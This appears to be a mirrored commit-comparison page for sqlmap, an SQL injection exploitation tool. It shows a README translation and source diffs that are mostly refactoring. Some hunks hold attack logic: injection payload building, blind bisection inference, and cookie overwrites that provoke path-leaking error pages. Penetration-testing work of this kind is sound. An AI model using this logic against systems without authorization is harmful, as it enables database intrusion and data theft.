Mirror of https://github.com/sqlmapproject/sqlmap.git (synced 2025-12-07 13:11:29 +00:00)
Compare commits
26 Commits
ce48217ada
0e728aa73e
f93c19ba9d
a42ddad9c1
a2973296a2
0961f6a5e9
5ec44b8346
d577c57a11
ca24509e19
e2d3187a78
b4980778dd
71457fea0e
34281af3f6
7dbbf3ecf5
c41c93a404
9a7343e9f7
e0401104f2
9da8d55128
864711b434
996ad59126
6d48df2454
55a43a837b
455d41c6a0
0f34300221
93a875ec71
0edb4f6680
@@ -52,6 +52,7 @@ Links

Translations
----

* [Bulgarian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bg-BG.md)
* [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md)
* [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md)
* [French](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md)
doc/translations/README-bg-BG.md (new file, 50 lines)
@@ -0,0 +1,50 @@
# sqlmap

[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)

sqlmap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of features that can be used for many purposes - fetching data from the database, accessing the underlying file system and executing commands on the operating system.

Screenshots
----

You can visit the [collection of screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) demonstrating some of the features, uploaded to the wiki.

Installation
----

You can download the latest tarball by clicking [here](https://github.com/sqlmapproject/sqlmap/tarball/master) or the latest zipball by clicking [here](https://github.com/sqlmapproject/sqlmap/zipball/master).

Preferably, you can download sqlmap by cloning the [Git](https://github.com/sqlmapproject/sqlmap) repository:

    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

sqlmap works out of the box with [Python](http://www.python.org/download/) version **2.6.x** and **2.7.x** on any platform.

Usage
----

To get a list of basic options use:

    python sqlmap.py -h

To get a list of all options use:

    python sqlmap.py -hh

You can find a sample run of sqlmap [here](https://asciinema.org/a/46601).
To get an overview of sqlmap's capabilities, a list of supported features and a description of all options, along with examples, you are advised to consult the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki/Usage).

Links
----

* Homepage: http://sqlmap.org
* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
* User's manual: https://github.com/sqlmapproject/sqlmap/wiki
* Frequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
* Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
* Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
@@ -552,7 +552,7 @@ def checkSqlInjection(place, parameter, value):
# Perform the test's request and grep the response
# body for the test's <grep> regular expression
try:
page, headers = Request.queryPage(reqPayload, place, content=True, raise404=False)
page, headers, _ = Request.queryPage(reqPayload, place, content=True, raise404=False)
output = extractRegexResult(check, page, re.DOTALL | re.IGNORECASE) \
or extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None, re.DOTALL | re.IGNORECASE) \
or extractRegexResult(check, listToStrValue([headers[key] for key in headers.keys() if key.lower() != URI_HTTP_HEADER.lower()] if headers else None), re.DOTALL | re.IGNORECASE) \
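The recurring change across these hunks is a signature update: Request.queryPage called with content=True now also hands back the HTTP status code as a third element (see the `return page, headers, code` hunk in Connect.queryPage further below), so every call site moves from 2-tuple to 3-tuple unpacking. A minimal sketch of the call-site pattern, reusing the names from the hunk above:

    # Sketch of the updated call-site pattern (names taken from the hunk above).
    # Before this changeset only two values were returned:
    #   page, headers = Request.queryPage(reqPayload, place, content=True, raise404=False)
    # After it, the HTTP status code comes back as well; callers that do not need
    # it discard it with "_", while others (e.g. _findUnionCharCount below) keep it
    # and pass it on to the page comparison routine as comparison(page, headers, code, ...).
    page, headers, _ = Request.queryPage(reqPayload, place, content=True, raise404=False)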
@@ -817,6 +817,8 @@ def heuristicCheckDbms(injection):
infoMsg += "could be '%s' " % retVal
logger.info(infoMsg)

kb.heuristicExtendedDbms = retVal

return retVal

def checkFalsePositives(injection):
@@ -959,7 +961,7 @@ def heuristicCheckSqlInjection(place, parameter):

payload = "%s%s%s" % (prefix, randStr, suffix)
payload = agent.payload(place, parameter, newValue=payload)
page, _ = Request.queryPage(payload, place, content=True, raise404=False)
page, _, _ = Request.queryPage(payload, place, content=True, raise404=False)

kb.heuristicPage = page
kb.heuristicMode = False
@@ -1015,7 +1017,7 @@ def heuristicCheckSqlInjection(place, parameter):
value = "%s%s%s" % (randStr1, DUMMY_NON_SQLI_CHECK_APPENDIX, randStr2)
payload = "%s%s%s" % (prefix, "'%s" % value, suffix)
payload = agent.payload(place, parameter, newValue=payload)
page, _ = Request.queryPage(payload, place, content=True, raise404=False)
page, _, _ = Request.queryPage(payload, place, content=True, raise404=False)

paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
@@ -1124,7 +1126,7 @@ def checkDynamicContent(firstPage, secondPage):
warnMsg += ". sqlmap is going to retry the request"
logger.critical(warnMsg)

secondPage, _ = Request.queryPage(content=True)
secondPage, _, _ = Request.queryPage(content=True)
findDynamicContent(firstPage, secondPage)

def checkStability():
@@ -1147,7 +1149,7 @@ def checkStability():
delay = max(0, min(1, delay))
time.sleep(delay)

secondPage, _ = Request.queryPage(content=True, noteResponseTime=False, raise404=False)
secondPage, _, _ = Request.queryPage(content=True, noteResponseTime=False, raise404=False)

if kb.redirectChoice:
return None
@@ -1229,7 +1231,7 @@ def checkString():
infoMsg += "target URL page content"
logger.info(infoMsg)

page, headers = Request.queryPage(content=True)
page, headers, _ = Request.queryPage(content=True)
rawResponse = "%s%s" % (listToStrValue(headers.headers if headers else ""), page)

if conf.string not in rawResponse:
@@ -1248,7 +1250,7 @@ def checkRegexp():
infoMsg += "the target URL page content"
logger.info(infoMsg)

page, headers = Request.queryPage(content=True)
page, headers, _ = Request.queryPage(content=True)
rawResponse = "%s%s" % (listToStrValue(headers.headers if headers else ""), page)

if not re.search(conf.regexp, rawResponse, re.I | re.M):
@@ -1455,7 +1457,7 @@ def checkConnection(suppressOutput=False):

try:
kb.originalPageTime = time.time()
page, headers = Request.queryPage(content=True, noteResponseTime=False)
page, headers, _ = Request.queryPage(content=True, noteResponseTime=False)
kb.originalPage = kb.pageTemplate = page

kb.errorIsNone = False
@@ -70,7 +70,7 @@ def setHandler():
(DBMS.INFORMIX, INFORMIX_ALIASES, InformixMap, InformixConn),
]

_ = max(_ if (Backend.getIdentifiedDbms() or "").lower() in _[1] else None for _ in items)
_ = max(_ if (Backend.getIdentifiedDbms() or kb.heuristicExtendedDbms or "").lower() in _[1] else None for _ in items)
if _:
items.remove(_)
items.insert(0, _)
@@ -2543,7 +2543,7 @@ def urlencode(value, safe="%&=-_", convall=False, limit=False, spaceplus=False):
# corner case when character % really needs to be
# encoded (when not representing URL encoded char)
# except in cases when tampering scripts are used
if all(map(lambda x: '%' in x, [safe, value])) and not kb.tamperFunctions:
if all('%' in _ for _ in (safe, value)) and not kb.tamperFunctions:
value = re.sub("%(?![0-9a-fA-F]{2})", "%25", value)

while True:
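A quick standalone illustration of the corner case that regex handles: a literal '%' that is not already the start of a URL-encoded pair gets escaped to '%25', while valid pairs are left untouched:

    import re

    value = "50% discount on item %41"
    print(re.sub("%(?![0-9a-fA-F]{2})", "%25", value))
    # -> 50%25 discount on item %41   ("%41" already looks URL-encoded, so it is kept)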
@@ -4393,4 +4393,4 @@ def getSafeExString(ex, encoding=None):
elif getattr(ex, "msg", None):
retVal = ex.msg

return getUnicode(retVal, encoding=encoding)
return getUnicode(retVal or "", encoding=encoding).strip()
@@ -628,7 +628,7 @@ def _findPageForms():
logger.info(infoMsg)

if not any((conf.bulkFile, conf.googleDork, conf.sitemapUrl)):
page, _ = Request.queryPage(content=True)
page, _, _ = Request.queryPage(content=True)
findPageForms(page, conf.url, True, True)
else:
if conf.bulkFile:
@@ -1863,6 +1863,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
kb.authHeader = None
kb.bannerFp = AttribDict()
kb.binaryField = False
kb.browserVerification = None

kb.brute = AttribDict({"tables": [], "columns": []})
kb.bruteMode = False
@@ -1922,6 +1923,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
kb.futileUnion = None
kb.headersFp = {}
kb.heuristicDbms = None
kb.heuristicExtendedDbms = None
kb.heuristicMode = False
kb.heuristicPage = False
kb.heuristicTest = None
@@ -77,8 +77,8 @@ optDict = {
"testParameter": "string",
"skip": "string",
"skipStatic": "boolean",
"skip": "string",
"paramExclude": "string",
"dbms": "string",
"dbmsCred": "string",
"os": "string",
"invalidBignum": "boolean",
@@ -19,7 +19,7 @@ from lib.core.enums import DBMS_DIRECTORY_NAME
from lib.core.enums import OS

# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
VERSION = "1.1.6.0"
VERSION = "1.1.7.0"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
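Worked through with the bumped value: "1.1.7.0" has three dots and a trailing "0" component, so it is treated as a monthly (stable) release and the trailing ".0" is dropped from the banner string:

    VERSION = "1.1.7.0"
    TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
    VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)

    print(TYPE)            # stable
    print(VERSION_STRING)  # sqlmap/1.1.7#stable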
@@ -295,7 +295,7 @@ BLANK = "<blank>"
CURRENT_DB = "CD"

# Regular expressions used for finding file paths in error messages
FILE_PATH_REGEXES = (r" in (file )?<b>(?P<result>.*?)</b> on line \d+", r"in (?P<result>[^<>]+?) on line \d+", r"(?:[>(\[\s])(?P<result>[A-Za-z]:[\\/][\w. \\/-]*)", r"(?:[>(\[\s])(?P<result>/\w[/\w.-]+)", r"href=['\"]file://(?P<result>/[^'\"]+)")
FILE_PATH_REGEXES = (r"<b>(?P<result>[^<>]+?)</b> on line \d+", r"(?P<result>[^<>'\"]+?)['\"]? on line \d+", r"(?:[>(\[\s])(?P<result>[A-Za-z]:[\\/][\w. \\/-]*)", r"(?:[>(\[\s])(?P<result>/\w[/\w.-]+)", r"href=['\"]file://(?P<result>/[^'\"]+)")

# Regular expressions used for parsing error messages (--parse-errors)
ERROR_PARSING_REGEXES = (
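For instance, the first of the tightened expressions pulls the script path out of a typical PHP warning (standalone sketch; the error text is made up):

    import re

    page = "Warning: mysql_fetch_array() expects parameter 1 to be resource in <b>/var/www/html/index.php</b> on line 12"
    match = re.search(r"<b>(?P<result>[^<>]+?)</b> on line \d+", page)
    print(match.group("result"))  # /var/www/html/index.php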
@@ -9,6 +9,8 @@ import codecs
import functools
import os
import re
import subprocess
import sys
import tempfile
import time
import urlparse
@@ -128,15 +130,15 @@ def _setRequestParams():
if kb.processUserMarks:
kb.testOnlyCustom = True

if not (kb.processUserMarks and CUSTOM_INJECTION_MARK_CHAR in conf.data):
if re.search(JSON_RECOGNITION_REGEX, conf.data):
message = "JSON data found in %s data. " % conf.method
message += "Do you want to process it? [Y/n/q] "
choice = readInput(message, default='Y')
if re.search(JSON_RECOGNITION_REGEX, conf.data):
message = "JSON data found in %s data. " % conf.method
message += "Do you want to process it? [Y/n/q] "
choice = readInput(message, default='Y')

if choice == 'Q':
raise SqlmapUserQuitException
elif choice == 'Y':
if choice == 'Q':
raise SqlmapUserQuitException
elif choice == 'Y':
if not (kb.processUserMarks and CUSTOM_INJECTION_MARK_CHAR in conf.data):
conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data)
conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*"[^"]+)"', functools.partial(process, repl=r'\g<1>%s"' % CUSTOM_INJECTION_MARK_CHAR), conf.data)
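The re.sub in the last line appends sqlmap's custom injection mark to every string value of a JSON POST body. A standalone illustration, assuming the mark character is '*' and using a plain replacement string in place of the functools.partial(process, ...) wrapper:

    import re

    MARK = '*'  # assumed stand-in for CUSTOM_INJECTION_MARK_CHAR
    data = '{"username": "admin", "id": 1}'

    marked = re.sub(r'("(?P<name>[^"]+)"\s*:\s*"[^"]+)"', r'\g<1>%s"' % MARK, data)
    print(marked)  # {"username": "admin*", "id": 1}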
@@ -147,59 +149,68 @@ def _setRequestParams():
|
||||
_ = re.sub(r'("[^"]+)"', '\g<1>%s"' % CUSTOM_INJECTION_MARK_CHAR, _)
|
||||
_ = re.sub(r'(\A|,|\s+)(-?\d[\d\.]*\b)', '\g<0>%s' % CUSTOM_INJECTION_MARK_CHAR, _)
|
||||
conf.data = conf.data.replace(match.group(0), match.group(0).replace(match.group(2), _))
|
||||
kb.postHint = POST_HINT.JSON
|
||||
|
||||
elif re.search(JSON_LIKE_RECOGNITION_REGEX, conf.data):
|
||||
message = "JSON-like data found in %s data. " % conf.method
|
||||
message += "Do you want to process it? [Y/n/q] "
|
||||
choice = readInput(message, default='Y').upper()
|
||||
kb.postHint = POST_HINT.JSON
|
||||
|
||||
if choice == 'Q':
|
||||
raise SqlmapUserQuitException
|
||||
elif choice == 'Y':
|
||||
elif re.search(JSON_LIKE_RECOGNITION_REGEX, conf.data):
|
||||
message = "JSON-like data found in %s data. " % conf.method
|
||||
message += "Do you want to process it? [Y/n/q] "
|
||||
choice = readInput(message, default='Y').upper()
|
||||
|
||||
if choice == 'Q':
|
||||
raise SqlmapUserQuitException
|
||||
elif choice == 'Y':
|
||||
if not (kb.processUserMarks and CUSTOM_INJECTION_MARK_CHAR in conf.data):
|
||||
conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data)
|
||||
conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
|
||||
conf.data = re.sub(r"('(?P<name>[^']+)'\s*:\s*'[^']+)'", functools.partial(process, repl=r"\g<1>%s'" % CUSTOM_INJECTION_MARK_CHAR), conf.data)
|
||||
conf.data = re.sub(r"('(?P<name>[^']+)'\s*:\s*)(-?\d[\d\.]*\b)", functools.partial(process, repl=r"\g<0>%s" % CUSTOM_INJECTION_MARK_CHAR), conf.data)
|
||||
kb.postHint = POST_HINT.JSON_LIKE
|
||||
|
||||
elif re.search(ARRAY_LIKE_RECOGNITION_REGEX, conf.data):
|
||||
message = "Array-like data found in %s data. " % conf.method
|
||||
message += "Do you want to process it? [Y/n/q] "
|
||||
choice = readInput(message, default='Y').upper()
|
||||
kb.postHint = POST_HINT.JSON_LIKE
|
||||
|
||||
if choice == 'Q':
|
||||
raise SqlmapUserQuitException
|
||||
elif choice == 'Y':
|
||||
elif re.search(ARRAY_LIKE_RECOGNITION_REGEX, conf.data):
|
||||
message = "Array-like data found in %s data. " % conf.method
|
||||
message += "Do you want to process it? [Y/n/q] "
|
||||
choice = readInput(message, default='Y').upper()
|
||||
|
||||
if choice == 'Q':
|
||||
raise SqlmapUserQuitException
|
||||
elif choice == 'Y':
|
||||
if not (kb.processUserMarks and CUSTOM_INJECTION_MARK_CHAR in conf.data):
|
||||
conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
|
||||
conf.data = re.sub(r"(=[^%s]+)" % DEFAULT_GET_POST_DELIMITER, r"\g<1>%s" % CUSTOM_INJECTION_MARK_CHAR, conf.data)
|
||||
kb.postHint = POST_HINT.ARRAY_LIKE
|
||||
|
||||
elif re.search(XML_RECOGNITION_REGEX, conf.data):
|
||||
message = "SOAP/XML data found in %s data. " % conf.method
|
||||
message += "Do you want to process it? [Y/n/q] "
|
||||
choice = readInput(message, default='Y').upper()
|
||||
kb.postHint = POST_HINT.ARRAY_LIKE
|
||||
|
||||
if choice == 'Q':
|
||||
raise SqlmapUserQuitException
|
||||
elif choice == 'Y':
|
||||
elif re.search(XML_RECOGNITION_REGEX, conf.data):
|
||||
message = "SOAP/XML data found in %s data. " % conf.method
|
||||
message += "Do you want to process it? [Y/n/q] "
|
||||
choice = readInput(message, default='Y').upper()
|
||||
|
||||
if choice == 'Q':
|
||||
raise SqlmapUserQuitException
|
||||
elif choice == 'Y':
|
||||
if not (kb.processUserMarks and CUSTOM_INJECTION_MARK_CHAR in conf.data):
|
||||
conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data)
|
||||
conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
|
||||
conf.data = re.sub(r"(<(?P<name>[^>]+)( [^<]*)?>)([^<]+)(</\2)", functools.partial(process, repl=r"\g<1>\g<4>%s\g<5>" % CUSTOM_INJECTION_MARK_CHAR), conf.data)
|
||||
kb.postHint = POST_HINT.SOAP if "soap" in conf.data.lower() else POST_HINT.XML
|
||||
|
||||
elif re.search(MULTIPART_RECOGNITION_REGEX, conf.data):
|
||||
message = "Multipart-like data found in %s data. " % conf.method
|
||||
message += "Do you want to process it? [Y/n/q] "
|
||||
choice = readInput(message, default='Y').upper()
|
||||
kb.postHint = POST_HINT.SOAP if "soap" in conf.data.lower() else POST_HINT.XML
|
||||
|
||||
if choice == 'Q':
|
||||
raise SqlmapUserQuitException
|
||||
elif choice == 'Y':
|
||||
elif re.search(MULTIPART_RECOGNITION_REGEX, conf.data):
|
||||
message = "Multipart-like data found in %s data. " % conf.method
|
||||
message += "Do you want to process it? [Y/n/q] "
|
||||
choice = readInput(message, default='Y').upper()
|
||||
|
||||
if choice == 'Q':
|
||||
raise SqlmapUserQuitException
|
||||
elif choice == 'Y':
|
||||
if not (kb.processUserMarks and CUSTOM_INJECTION_MARK_CHAR in conf.data):
|
||||
conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data)
|
||||
conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
|
||||
conf.data = re.sub(r"(?si)((Content-Disposition[^\n]+?name\s*=\s*[\"'](?P<name>[^\n]+?)[\"']).+?)(((\r)?\n)+--)", functools.partial(process, repl=r"\g<1>%s\g<4>" % CUSTOM_INJECTION_MARK_CHAR), conf.data)
|
||||
kb.postHint = POST_HINT.MULTIPART
|
||||
|
||||
kb.postHint = POST_HINT.MULTIPART
|
||||
|
||||
if not kb.postHint:
|
||||
if CUSTOM_INJECTION_MARK_CHAR in conf.data: # later processed
|
||||
@@ -660,6 +671,7 @@ def _createTargetDirs():
with codecs.open(os.path.join(conf.outputPath, "target.txt"), "w+", UNICODE_ENCODING) as f:
f.write(kb.originalUrls.get(conf.url) or conf.url or conf.hostname)
f.write(" (%s)" % (HTTPMETHOD.POST if conf.data else HTTPMETHOD.GET))
f.write(" # %s" % getUnicode(subprocess.list2cmdline(sys.argv), encoding=sys.stdin.encoding))
if conf.data:
f.write("\n\n%s" % getUnicode(conf.data))
except IOError, ex:
@@ -48,7 +48,8 @@ def cmdLineParser(argv=None):

checkSystemEncoding()

_ = getUnicode(os.path.basename(argv[0]), encoding=sys.getfilesystemencoding() or UNICODE_ENCODING)
# Reference: https://stackoverflow.com/a/4012683 (Note: previously used "...sys.getfilesystemencoding() or UNICODE_ENCODING")
_ = getUnicode(os.path.basename(argv[0]), encoding=sys.stdin.encoding)

usage = "%s%s [options]" % ("python " if not IS_WIN else "", \
"\"%s\"" % _ if " " in _ else _)
@@ -848,8 +849,9 @@ def cmdLineParser(argv=None):
advancedHelp = True
extraHeaders = []

# Reference: https://stackoverflow.com/a/4012683 (Note: previously used "...sys.getfilesystemencoding() or UNICODE_ENCODING")
for arg in argv:
_.append(getUnicode(arg, encoding=sys.getfilesystemencoding() or UNICODE_ENCODING))
_.append(getUnicode(arg, encoding=sys.stdin.encoding))

argv = _
checkDeprecatedOptions(argv)
@@ -155,7 +155,7 @@ def checkCharEncoding(encoding, warn=True):
return encoding

# Reference: http://www.destructor.de/charsets/index.htm
translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932", "en": "us"}
translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "iso-8859-0": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932", "en": "us"}

for delimiter in (';', ',', '('):
if delimiter in encoding:
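The new "iso-8859-0" entry normalizes another bogus charset name occasionally reported by servers; Python's codec registry only knows real encodings, so the name has to be rewritten before a codecs lookup can succeed (illustration of the idea only, not the full function):

    import codecs

    translate = {"iso-8859-0": "iso8859-1"}      # excerpt of the table above

    encoding = "iso-8859-0"                      # as reported by a misconfigured server
    encoding = translate.get(encoding, encoding)
    print(codecs.lookup(encoding).name)          # iso8859-1; the raw name would raise LookupError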
@@ -375,6 +375,13 @@ def processResponse(page, responseHeaders, status=None):
conf.paramDict[PLACE.POST][name] = value
conf.parameters[PLACE.POST] = re.sub("(?i)(%s=)[^&]+" % re.escape(name), r"\g<1>%s" % re.escape(value), conf.parameters[PLACE.POST])

if not kb.browserVerification and re.search(r"(?i)browser.?verification", page or ""):
kb.browserVerification = True
warnMsg = "potential browser verification protection mechanism detected"
if re.search(r"(?i)CloudFlare", page):
warnMsg += " (CloudFlare)"
singleTimeWarnMessage(warnMsg)

if not kb.captchaDetected and re.search(r"(?i)captcha", page or ""):
for match in re.finditer(r"(?si)<form.+?</form>", page):
if re.search(r"(?i)captcha", match.group(0)):
@@ -289,7 +289,7 @@ class Connect(object):

_ = urlparse.urlsplit(url)
requestMsg = u"HTTP request [#%d]:\n%s " % (threadData.lastRequestUID, method or (HTTPMETHOD.POST if post is not None else HTTPMETHOD.GET))
requestMsg += ("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else "")) if not any((refreshing, crawling, checking)) else url
requestMsg += getUnicode(("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else "")) if not any((refreshing, crawling, checking)) else url)
responseMsg = u"HTTP response "
requestHeaders = u""
responseHeaders = None
@@ -622,7 +622,7 @@ class Connect(object):
debugMsg = "got HTTP error code: %d (%s)" % (code, status)
logger.debug(debugMsg)

except (urllib2.URLError, socket.error, socket.timeout, httplib.HTTPException, struct.error, binascii.Error, ProxyError, SqlmapCompressionException, WebSocketException, TypeError):
except (urllib2.URLError, socket.error, socket.timeout, httplib.HTTPException, struct.error, binascii.Error, ProxyError, SqlmapCompressionException, WebSocketException, TypeError, ValueError):
tbMsg = traceback.format_exc()

if checking:
@@ -660,6 +660,8 @@ class Connect(object):
warnMsg += " ('%s')" % match.group(1).strip()
elif "NTLM" in tbMsg:
warnMsg = "there has been a problem with NTLM authentication"
elif "Invalid header name" in tbMsg: # (e.g. PostgreSQL ::Text payload)
return None, None, None
elif "BadStatusLine" in tbMsg:
warnMsg = "connection dropped or unknown HTTP "
warnMsg += "status code received"
@@ -679,6 +681,9 @@ class Connect(object):
if "BadStatusLine" not in tbMsg and any((conf.proxy, conf.tor)):
warnMsg += " or proxy"

if silent:
return None, None, None

with kb.locks.connError:
kb.connErrorCounter += 1
@@ -692,9 +697,7 @@ class Connect(object):
if kb.connErrorChoice is False:
raise SqlmapConnectionException(warnMsg)

if silent:
return None, None, None
elif "forcibly closed" in tbMsg:
if "forcibly closed" in tbMsg:
logger.critical(warnMsg)
return None, None, None
elif ignoreTimeout and any(_ in tbMsg for _ in ("timed out", "IncompleteRead")):
@@ -1035,16 +1038,19 @@ class Connect(object):
try:
compiler.parse(unicodeencode(conf.evalCode.replace(';', '\n')))
except SyntaxError, ex:
original = replacement = ex.text.strip()
for _ in re.findall(r"[A-Za-z_]+", original)[::-1]:
if _ in keywords:
replacement = replacement.replace(_, "%s%s" % (_, EVALCODE_KEYWORD_SUFFIX))
if ex.text:
original = replacement = ex.text.strip()
for _ in re.findall(r"[A-Za-z_]+", original)[::-1]:
if _ in keywords:
replacement = replacement.replace(_, "%s%s" % (_, EVALCODE_KEYWORD_SUFFIX))
break
if original == replacement:
conf.evalCode = conf.evalCode.replace(EVALCODE_KEYWORD_SUFFIX, "")
break
if original == replacement:
conf.evalCode = conf.evalCode.replace(EVALCODE_KEYWORD_SUFFIX, "")
break
else:
conf.evalCode = conf.evalCode.replace(getUnicode(ex.text.strip(), UNICODE_ENCODING), replacement)
else:
conf.evalCode = conf.evalCode.replace(getUnicode(ex.text.strip(), UNICODE_ENCODING), replacement)
break
else:
break
@@ -1224,7 +1230,7 @@ class Connect(object):
kb.permissionFlag = re.search(PERMISSION_DENIED_REGEX, page or "", re.I) is not None

if content or response:
return page, headers
return page, headers, code

if getRatioValue:
return comparison(page, headers, code, getRatioValue=False, pageLength=pageLength), comparison(page, headers, code, getRatioValue=True, pageLength=pageLength)
@@ -13,7 +13,7 @@ def getPageTemplate(payload, place):

if payload and place:
if (payload, place) not in kb.pageTemplates:
page, _ = Request.queryPage(payload, place, content=True, raise404=False)
page, _, _ = Request.queryPage(payload, place, content=True, raise404=False)
kb.pageTemplates[(payload, place)] = (page, kb.lastParserStatus is None)

retVal = kb.pageTemplates[(payload, place)]
@@ -232,7 +232,7 @@ class Web:
if place in conf.parameters:
value = re.sub(r"(\A|&)(\w+)=", "\g<2>[]=", conf.parameters[place])
if "[]" in value:
page, headers = Request.queryPage(value=value, place=place, content=True, raise404=False, silent=True, noteResponseTime=False)
page, headers, _ = Request.queryPage(value=value, place=place, content=True, raise404=False, silent=True, noteResponseTime=False)
parseFilePaths(page)

cookie = None
@@ -244,12 +244,12 @@ class Web:
if cookie:
value = re.sub(r"(\A|;)(\w+)=[^;]*", "\g<2>=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", cookie)
if value != cookie:
page, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False)
page, _, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False)
parseFilePaths(page)

value = re.sub(r"(\A|;)(\w+)=[^;]*", "\g<2>=", cookie)
if value != cookie:
page, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False)
page, _, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False)
parseFilePaths(page)

directories = list(arrayizeValue(getManualDirectories()))
@@ -187,8 +187,9 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
else:
posValue = ord(hintValue[idx - 1])

forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, posValue))
result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
forgedPayload = agent.extractPayload(payload)
forgedPayload = safeStringFormat(forgedPayload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, posValue))
result = Request.queryPage(agent.replacePayload(payload, forgedPayload), timeBasedCompare=timeBasedCompare, raise404=False)
incrementCounter(kb.technique)

if result:
@@ -121,7 +121,7 @@ def _oneShotErrorUse(expression, field=None, chunkTest=False):
payload = agent.payload(newValue=injExpression)

# Perform the request
page, headers = Request.queryPage(payload, content=True, raise404=False)
page, headers, _ = Request.queryPage(payload, content=True, raise404=False)

incrementCounter(kb.technique)
@@ -352,93 +352,94 @@ def errorUse(expression, dump=False):
|
||||
value = [] # for empty tables
|
||||
return value
|
||||
|
||||
if " ORDER BY " in expression and (stopLimit - startLimit) > SLOW_ORDER_COUNT_THRESHOLD:
|
||||
message = "due to huge table size do you want to remove "
|
||||
message += "ORDER BY clause gaining speed over consistency? [y/N] "
|
||||
if isNumPosStrValue(count) and int(count) > 1:
|
||||
if " ORDER BY " in expression and (stopLimit - startLimit) > SLOW_ORDER_COUNT_THRESHOLD:
|
||||
message = "due to huge table size do you want to remove "
|
||||
message += "ORDER BY clause gaining speed over consistency? [y/N] "
|
||||
|
||||
if readInput(message, default="N", boolean=True):
|
||||
expression = expression[:expression.index(" ORDER BY ")]
|
||||
if readInput(message, default="N", boolean=True):
|
||||
expression = expression[:expression.index(" ORDER BY ")]
|
||||
|
||||
numThreads = min(conf.threads, (stopLimit - startLimit))
|
||||
numThreads = min(conf.threads, (stopLimit - startLimit))
|
||||
|
||||
threadData = getCurrentThreadData()
|
||||
threadData = getCurrentThreadData()
|
||||
|
||||
try:
|
||||
threadData.shared.limits = iter(xrange(startLimit, stopLimit))
|
||||
except OverflowError:
|
||||
errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit)
|
||||
errMsg += "with switch '--fresh-queries'"
|
||||
raise SqlmapDataException(errMsg)
|
||||
try:
|
||||
